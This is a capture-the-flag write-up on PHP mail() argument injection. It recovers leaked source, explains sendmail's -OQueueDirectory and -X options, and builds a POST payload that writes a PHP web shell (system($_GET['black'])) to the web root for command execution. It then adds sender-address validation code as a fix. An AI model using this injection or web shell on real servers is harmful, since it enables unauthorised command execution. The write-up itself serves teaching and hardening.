Abusing the PHP mail() function can give an attacker remote code execution and serve other malicious ends.

0x00 Obtaining the source code

Step one: request /.index.php.swp to recover the leaked source. The main functional code is roughly as follows.
```php
// Leaked handler recovered from the .swp file. chkEmail(), chkTitle() and
// chkContent() are defined elsewhere in the leaked source and are not shown here.
if(isset($_POST['submit'])){
    $email   = isset($_POST['email'])   ? trim($_POST['email'])   : '';
    $title   = isset($_POST['title'])   ? trim($_POST['title'])   : '';
    $content = isset($_POST['content']) ? trim($_POST['content']) : '';
    if(chkEmail($email) && chkTitle($title) && chkContent($content)){
        $to      = 'ambulong@vulnspy.com';
        $subject = "收到來(lái)自 {$email} 的留言";
        $msg     = "{$title}\n{$content}\nFrom: {$email}";
        $headers = 'From: ' . $email . "\r\n" .
                   'Reply-To: ' . $email . "\r\n" .
                   'X-Mailer: PHP/' . phpversion();
        // The user-supplied address is passed straight into sendmail's command line.
        $options = sprintf('-f%s', $email);
        if(mail($to, $subject, $msg, $headers, $options)){
            echo "發(fā)送成功";
        }else{
            echo "發(fā)送失敗";
        }
    }
    exit;
}
```
0x01 Analysis of the mail function

The mail function

The mail function sends e-mail from a PHP application and takes five parameters.

```php
bool mail ( string $to , string $subject , string $message [, string $additional_headers [, string $additional_parameters ]] )
```

Its parameters are described below:
| Parameter | Description |
|---|---|
| to | Recipient of the mail |
| subject | Subject of the mail |
| message | Message to send |
| headers | Additional headers |
| parameters | Additional parameters for the mail program |
The manual describes the fifth parameter as follows:

> The additional_parameters parameter can be used to pass additional flags as command line options to the program configured to be used when sending mail, as defined by the sendmail_path configuration setting. For example, this can be used to set the envelope sender address when using sendmail with the -f sendmail option.
>
> This parameter is escaped by escapeshellcmd() internally to prevent command execution. escapeshellcmd() prevents command execution, but allows to add additional parameters. For security reasons, it is recommended for the user to sanitize this parameter to avoid adding unwanted parameters to the shell command.
Web applications typically use this parameter to set the sender address, for example `-f miao@abc.com`. The mail function invokes the system's /usr/bin/sendmail program, which is installed by the mail transfer agent and is the interface used for sending mail. The sendmail command is executed with the help of the system shell, which is why extra tokens in this parameter become extra sendmail options.
Attack vector

Through the fifth parameter, sendmail's *-O*, *-X* and *-C* options can lead to arbitrary file read/write.

- `-OQueueDirectory=/tmp`: selects a writable directory in which to store temporary files
- `-X/tmp/log.txt`: writes the log file to an arbitrary directory

`-OQueueDirectory=/tmp` can be abbreviated as `-oQ/tmp/`; the `-X` option also accepts a relative path, for example `-X ./log.txt`.
0x02 Exploitation

Back to the challenge: looking at these two lines of the source, the `$options` parameter is user-controlled, being `-f` concatenated with the email field the user submitted.
```php
$options = sprintf('-f%s', $email);
if(mail($to, $subject, $msg, $headers, $options)){...}
```
Construct the POST parameters as follows (the web root is a common-sense guess; a relative path also works):

```text
email=miao@126.com -OQueueDirectory=/tmp -X/var/www/html/black.php
content=<?php system($_GET["black"]); ?>
```

Then request /black.php?black=command and finally read the flag.php file.
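The root cause is that the address reaches sendmail's command line unchanged, so any whitespace lets a second option through. The following is an added hardening example, not the challenge's own code: it keeps the form fields from the leaked source but replaces the unchecked `sprintf('-f%s', $email)` with a validator that refuses anything that is not a single mailbox. The function names `senderOption()` and `senderHeaders()` and the sample inputs are assumptions made for this example.

```php
<?php
// Added example: validate a user-supplied address before it becomes part of
// the sendmail command line or of the mail headers. Not the challenge's code.

/**
 * Return the "-f<address>" string for mail()'s fifth parameter, or null
 * when the input must be refused.
 */
function senderOption(string $email): ?string
{
    // FILTER_VALIDATE_EMAIL accepts only one syntactically valid mailbox.
    // Whitespace, angle brackets and control characters all fail here, so the
    // option string can never carry a second token such as -X or -oQ.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }

    // Defence in depth: even if the validator is relaxed later, refuse any
    // character that the shell or sendmail's option parser treats specially.
    if (preg_match('/[\s"\'`$\\\\;|&<>]/', $email) === 1) {
        return null;
    }

    return '-f' . $email;
}

/**
 * Build the From:/Reply-To: headers from the same address. A bare CR or LF
 * would start a new header line (header injection), so it is refused too.
 */
function senderHeaders(string $email): ?string
{
    if (senderOption($email) === null || preg_match('/[\r\n]/', $email) === 1) {
        return null;
    }
    return 'From: ' . $email . "\r\n"
         . 'Reply-To: ' . $email . "\r\n"
         . 'X-Mailer: PHP/' . phpversion();
}

// Constructed sample inputs: an ordinary address, the injection string from
// this write-up, and a header-injection attempt. Nothing is actually sent.
$samples = [
    'miao@126.com',
    'miao@126.com -OQueueDirectory=/tmp -X/var/www/html/black.php',
    "miao@126.com\r\nBcc: someone@example.invalid",
];

foreach ($samples as $input) {
    $opt = senderOption($input);
    printf("%-75s => %s\n",
        json_encode($input),
        $opt === null ? 'REJECTED' : "accepted, fifth parameter = {$opt}");
}

// In the original handler the validated values would be used as:
//   $options = senderOption($email);
//   $headers = senderHeaders($email);
//   if ($options !== null && $headers !== null) {
//       mail($to, $subject, $msg, $headers, $options);
//   }
```

Running this prints the first address as accepted and the other two as rejected. If the application does not actually need a user-chosen envelope sender, the simplest fix is to drop the fifth argument to mail() altogether; the envelope sender then comes from php.ini (`sendmail_from` / `sendmail_path`) and user input never touches the sendmail command line.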
References: drops.blbana.cc; http://www.php.net/manual/en/function.mail.php; http://www.360zhijia.com/360anquanke/197210.html